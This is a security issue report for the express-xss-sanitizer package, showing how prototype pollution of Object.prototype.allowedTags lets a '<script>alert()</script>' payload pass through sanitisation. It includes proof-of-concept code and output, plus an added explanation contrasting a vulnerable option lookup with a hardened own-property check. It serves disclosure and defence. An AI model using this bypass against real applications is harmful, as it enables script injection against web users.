XSS bypass by using prototype pollution #4

Closed
@jayateertha043

Description

Issue: express-xss-sanitizer doesn't sanitize XSS payloads properly when the client is already affected by prototype pollution.

Affected versions: v1.1.2 and earlier

Code -

//Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information

var expressXssSanitizer = require("express-xss-sanitizer");
// Payload that should come back with the <script> element removed.
var data = "<h1>Hi</h1><script>alert()</script>";
// Simulate a client already affected by prototype pollution: every object now
// appears to carry an allowedTags property unless it defines its own.
Object.prototype.allowedTags = ['script'];
// Empty options object: the sanitizer resolves allowedTags through the prototype chain.
data = expressXssSanitizer.sanitize(data, {});
console.log(data);

Output -

"\n\n⚠️ Your `allowedTags` option includes, `script`, which… option\nand ensure you are accounting for this risk.\n\n"
"Hi<script>alert()</script>"

For a live PoC - https://runkit.com/embed/w306l6zfm7tu
Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information.
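The option-lookup pattern this report exercises, as an added example that is not express-xss-sanitizer's own code: a hypothetical option reader that falls through to the prototype chain beside one that only honours the caller's own properties, run against the report's payload with `Object.prototype.allowedTags` polluted and then cleaned up. The tag filter is a constructed stand-in, not a real sanitizer.

```javascript
// Added illustration (not express-xss-sanitizer's code): why an option lookup
// that walks the prototype chain is affected by prototype pollution, and a
// hardened lookup that only honours properties the caller set itself.

const DEFAULT_ALLOWED_TAGS = Object.freeze(['h1', 'p', 'b', 'i', 'a']);

// Vulnerable pattern: `options.allowedTags` resolves through Object.prototype,
// so a polluted prototype silently replaces the allow-list.
function allowedTagsVulnerable(options = {}) {
  return options.allowedTags || DEFAULT_ALLOWED_TAGS;
}

// Hardened pattern: honour allowedTags only when it is an own property of the
// options object (and is actually an array); otherwise use the defaults.
function allowedTagsHardened(options = {}) {
  if (Object.prototype.hasOwnProperty.call(options, 'allowedTags')
      && Array.isArray(options.allowedTags)) {
    return options.allowedTags;
  }
  return DEFAULT_ALLOWED_TAGS;
}

// Constructed minimal tag filter, only to make the effect observable: it strips
// any element whose tag name is not on the allow-list. It is NOT a sanitizer.
function stripDisallowedTags(html, allowedTags) {
  const allowed = new Set(allowedTags.map((t) => t.toLowerCase()));
  return html.replace(/<\/?([a-z][a-z0-9]*)\b[^>]*>/gi, (match, tag) =>
    (allowed.has(tag.toLowerCase()) ? match : ''));
}

// Reproduce the report in isolation: pollute, run both lookups on an empty
// options object, then remove the polluted property so it cannot leak further.
function demo() {
  const data = '<h1>Hi</h1><script>alert()</script>';
  Object.prototype.allowedTags = ['script']; // the polluted state from the report
  try {
    return {
      vulnerable: stripDisallowedTags(data, allowedTagsVulnerable({})),
      hardened: stripDisallowedTags(data, allowedTagsHardened({})),
    };
  } finally {
    delete Object.prototype.allowedTags;
  }
}

console.log(demo());
```

With the prototype polluted, the vulnerable lookup yields exactly the report's output (`Hi<script>alert()</script>`), while the own-property check keeps the defaults and the `<script>` element is stripped.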
